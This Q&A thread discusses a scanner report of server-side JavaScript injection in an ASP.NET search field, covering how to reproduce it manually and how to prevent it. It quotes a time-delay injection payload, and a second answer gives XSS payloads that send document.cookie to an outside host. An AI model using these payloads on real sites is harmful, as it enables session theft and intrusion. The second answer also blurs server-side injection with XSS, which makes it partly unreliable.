Server side JavaScript attack
A security check on an ASP.NET website that we are developing reported the following in the input field used for search:
"The ctl00%24txtTopQckSearch parameter is vulnerable to a server-side JavaScript attack. The provided value appears to be wrapped in dynamically evaluated JavaScript in a single-quoted context.
Payload '+(function(){if(typeof cb715==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);cb715=1;}}())+' presented in parameter ctl00%24txtTopQckSearch. The application took 7641 milliseconds to respond to the request, compared to 5625 milliseconds for the original request, indicating that the injected JavaScript was causing a delay.
Note that in order to manually reproduce this behavior using the report, you will need to change the name of the canary variable, which is currently cb715."
My questions:
What is Server Side JavaScript Injection (as opposed to client-side XSS injection)?
How can I manually recreate the server side attack described above?
How can this be prevented?
Thanks!
What is Server Side JavaScript Injection (as opposed to client-side XSS injection)?
This is a vulnerability that could allow an attacker to execute their JavaScript code on your server (as opposed to a browser).
How can I manually recreate the server side attack described above?
The report refers to a control txtTopQckSearch and says that it passed the value +(function(){if(typeof cb715==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);cb715=1;}}())+ for that control.
So you can try to recreate it by:
- Determining which page is using a control with that name
- Putting this JavaScript into this control (but changing the two occurrences of cb715 to a different name)
- Submitting the page
If the scan results are correct, this query should take slightly longer than a query that does not use this value.
How can this be prevented?
Monitor the control txtTopQckSearch and make sure that the values retrieved from that control are never merged into any code that runs on your server.
I think it is quite possible that it is a red herring and that the request was just a little stretched due to some hesitation on your server (the fact that a "safe" request to this page took > 5 seconds indicates that the page may have some performance issues).
One good reason to suspect it is a red herring is that if this code were to run before your server sent a response, the response time difference would be 20 seconds, not the 2 seconds reported by the scan.
So, investigate if there are any possible security holes with this control, and if not, write it off as bogus.
They can inject JavaScript code. This is an XSS vulnerability.
If you have this code (don't know ASP sorry):
<div><?php echo $_GET["foo"];?></div>
It will print whatever you pass as foo. So if you get someone to load:
http://yoursite.com/index.php?foo=<script>document.location.href="http://mywebsite.com/?cookie=" + document.cookie</script>
I just stole their session. It injects a JavaScript snippet that reads cookies and sends it to my site.
A similar approach exists in JavaScript:
<script>var data = <?php echo $_GET["foo"];?>;</script>
Now if the value of foo is something like
"";document.location.href="http://mywebsite.com/?cookie=" + document.cookie
I stole cookies again.
How to avoid XSS: always, always, always escape untrusted content. In PHP, the functions are htmlspecialchars (for HTML) and json_encode (for JavaScript).
They discover the XSS vulnerability by injecting code that takes a long time (creating 20,000 Date objects) and comparing the time it takes to load the page.